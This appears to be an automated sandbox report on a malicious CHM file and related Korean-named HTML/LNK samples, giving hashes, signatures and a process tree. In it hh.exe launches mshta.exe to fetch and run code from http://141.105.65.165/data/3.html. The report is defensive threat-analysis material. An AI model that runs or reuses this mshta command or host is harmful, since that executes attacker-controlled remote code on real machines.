Analysis
max time kernel: 55s
max time network: 45s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 21-03-2023 23:32
Behavioral tasks
behavioral1: sample LG유플러스_이동통신_202208_이_선.html, resource win7-20230220-en
behavioral2: sample LG유플러스_이동통신_202208_이_선.html, resource win10v2004-20230220-en
behavioral3: sample LG유플러스_이동통신_202208_이_선.html.lnk, resource win7-20230220-en
behavioral4: sample LG유플러스_이동통신_202208_이_선.html.lnk, resource win10v2004-20230220-en
behavioral5: sample MAIL_20230125151802.chm, resource win7-20230220-en
behavioral6: sample MAIL_20230125151802.chm, resource win10v2004-20230221-en
behavioral7: sample Message.chm, resource win7-20230220-en
behavioral8: sample Message.chm, resource win10v2004-20230220-en
behavioral9: sample Message.chm, resource win7-20230220-en
behavioral10: sample Message.chm, resource win10v2004-20230220-en
General
Target: MAIL_20230125151802.chm
Size: 10KB
MD5: 45bd3001517f5e913ddde83827f4cc29
SHA1: 710a7d78c4bbca17d6cefce8c392e7d358c37a8d
SHA256: c80fbab8c27cb9be91885a470377088d6639b95b85dfe5ae3c346e537b143a87
SHA512: c2dcf7d3d6e1353fe6259e326517c07c2e168bc83c0847c293d15d2a0fcc0bbec31506de2347b45a6455465d88a27bde68179352c4473a8eac7ce63b3581bb75
SSDEEP: 48:U5yGg202QRlEFlErlElZO5sD7GH6N6xWX3VGJtihAxkNzY94ApKSE7HWVMjUBxBD:U5y6khHq6UMl94A0AMjUBxBjR7UyEf0
Malware Config
Extracted
http://141.105.65.165/data/3.html
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   process
  3     1196  mshta.exe
  5     1196  mshta.exe

Modifies Internet Explorer settings (2 IoCs)
  description                                                                                                          process
  Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main  hh.exe
  Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description                        pid   process
  Token: 33                          1472  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  1472  AUDIODG.EXE
  Token: 33                          1472  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  1472  AUDIODG.EXE

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid  process
  748  hh.exe
  748  hh.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                      pid  process  target process
  PID 748 wrote to memory of 1196  748  hh.exe   mshta.exe
  PID 748 wrote to memory of 1196  748  hh.exe   mshta.exe
  PID 748 wrote to memory of 1196  748  hh.exe   mshta.exe
Processes

C:\Windows\hh.exe
  command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\MAIL_20230125151802.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\mshta.exe (child of hh.exe)
    command line: "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings

C:\Windows\system32\AUDIODG.EXE
  command line: C:\Windows\system32\AUDIODG.EXE 0x458
  - Suspicious use of AdjustPrivilegeToken